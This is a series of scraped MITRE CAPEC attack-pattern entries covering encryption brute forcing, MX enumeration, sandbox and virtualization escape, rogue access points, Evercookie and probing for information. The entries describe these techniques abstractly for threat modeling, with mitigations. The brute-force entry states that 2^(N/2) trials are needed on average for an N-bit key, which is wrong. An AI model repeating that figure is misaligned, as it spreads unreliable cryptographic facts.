2017-01-09 (Version 2.9)	Probabilistic Techniques

CAPEC-20: Encryption Brute Forcing

Attack Pattern ID: 20

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	112	Brute Force
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	97	Cryptanalysis
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	668	Key Negotiation of Bluetooth Attack (KNOB)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine the ciphertext and the encryption algorithm.

Experiment

Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.

Prerequisites

Ciphertext is known.

Encryption algorithm and key size are known.

Skills Required

[Level: Low]

Brute forcing encryption does not require much skill.

Resources Required

A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).

On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.

Obviously as N gets large the brute force approach becomes infeasible.

Indicators

None. This attack happens offline.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.

In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.

Example Instances

In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days.

Related Weaknesses

CWE-ID	Weakness Name
326	Inadequate Encryption Strength
327	Use of a Broken or Risky Cryptographic Algorithm
693	Protection Mechanism Failure
1204	Generation of Weak Initialization Vector (IV)

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Related_Weaknesses

CAPEC CATEGORY: Engage in Deceptive Interactions

Category ID: 156

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	173	Action Spoofing
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	690	Metadata Spoofing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Relationships
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Relationships
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Relationships
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Deceptive Interactions

CAPEC-290: Enumerate Mail Exchange (MX) Records

Attack Pattern ID: 290

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary requires access to a DNS server that will return the MX records for a network.

Resources Required

A command-line utility or other application capable of sending requests to the DNS server is necessary.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 38. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description Summary, Related_Weaknesses

CAPEC-237: Escaping a Sandbox by Calling Code in Another Language

Attack Pattern ID: 237

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	480	Escaping Virtualization

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
Techniques
The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.
Techniques
The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.
Techniques
The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.
Techniques
The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.

Skills Required

[Level: High]

The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Access Control Authorization	Bypass Protection Mechanism
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges

Mitigations

Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.

Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.

Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.

Configuration: Get latest updates for the computer.

Example Instances

Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named "msits.exe", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003.

Related Weaknesses

CWE-ID	Weakness Name
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-91] J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy and T. Anderson. "Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code". The 17th ACM Conference on Computer and Communications Security (CCS '10). 2010.

[REF-92] "Malware Protection Center: Threat Research and Response". Exploit: Java/ByteVerify.C. Microsoft Corporation. 2007. <https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, References
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Description, Execution_Flow, Prerequisites, Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Calling Signed Code From Another Language Within A Sandbox Allow This

2020-12-17 (Version 3.4)	Escaping a Sandbox by Calling Signed Code in Another Language

CAPEC-480: Escaping Virtualization

Attack Pattern ID: 480

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	237	Escaping a Sandbox by Calling Code in Another Language

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probing: The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.
Techniques
Probing applications, services, or devices for virtualization weaknesses.

Experiment

Verify the exploitable security weaknesses: Using the found weakness, the adversary attempts to escape the virtualized environment.
Techniques
Using an application weakness to escape a virtualized environment

Exploit

Execute more complex attacks: Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.
Techniques
Executing complex attacks when given higher permissions by escaping a virtualized environment

Consequences

Scope	Impact	Likelihood
Access Control Authorization	Bypass Protection Mechanism
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges

Mitigations

Ensure virtualization software is current and up-to-date.

Abide by the least privilege principle to avoid assigning users more privileges than necessary.

Related Weaknesses

CWE-ID	Weakness Name
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1611	Escape to Host

Content History

Submissions
Submission Date	Submitter	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)
Modifications
Modification Date	Modifier	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Resources_Required
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-616: Establish Rogue Location

Attack Pattern ID: 616

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	505	Scheme Squatting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	611	BitSquatting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	615	Evil Twin Wi-Fi Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	617	Cellular Rogue Base Station
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	630	TypoSquatting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	631	SoundSquatting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	632	Homograph Attack via Homoglyphs
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	667	Bluetooth Impersonation AttackS (BIAS)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	695	Repo Jacking
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

A resource is expected to available to the user.

Skills Required

[Level: Low]

Adversaries can often purchase low-cost technology to implement rogue access points.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity	Other

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1036.005	Masquerading: Match Legitimate Name or Location

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2017-05-01 (Version 2.10)	Patiently Waiting at Incorrect Location

CAPEC-464: Evercookie

Attack Pattern ID: 464

Abstraction: Standard

View customized information:

Description

Extended Description

The places a persistent cookie is stored on a victim's machine include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	554	Functionality Bypass

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The victim's browser is not configured to reject all cookiesThe victim visits a website that serves the attackers' evercookie

Resources Required

Evercookie source code

Mitigations

Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.

Design: Safari browser's private browsing mode is currently effective against evercookies.

Related Weaknesses

CWE-ID	Weakness Name
359	Exposure of Private Personal Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1606.001	Forge Web Credentials: Web Cookies

References

[REF-401] Samy Kamkar. "Evercookie". 2010-09-09. <http://samy.pl/evercookie/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-615: Evil Twin Wi-Fi Attack

Attack Pattern ID: 615

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

None

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description, Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-116: Excavation

Attack Pattern ID: 116

Abstraction: Meta

View customized information:

Description

An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.

Extended Description

This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	54	Query System for Information
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	569	Collect Data as Provided by Users
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	675	Retrieve Data from Decommissioned Devices
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	163	Spear Phishing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

An adversary requires some way of interacting with the system.

Resources Required

A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Minimize error/response output to only what is necessary for functional use or corrective language.

Remove potentially sensitive information that is not necessary for the application's functionality.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor
1243	Sensitive Non-Volatile Information Not Protected During Debug

Notes

Other

Large quantities of data is often moved from the target system to some other adversary controlled system. Data found on a target system might require extensive resources to be fully analyzed. Using these resources on the target system might enable a defender to detect the adversary. Additionally, proper analysis tools required might not be available on the target system.

Other

This attack differs from Data Interception and other data collection attacks in that the attacker actively queries the target rather than simply watching for the target to reveal information.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Other_Notes, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

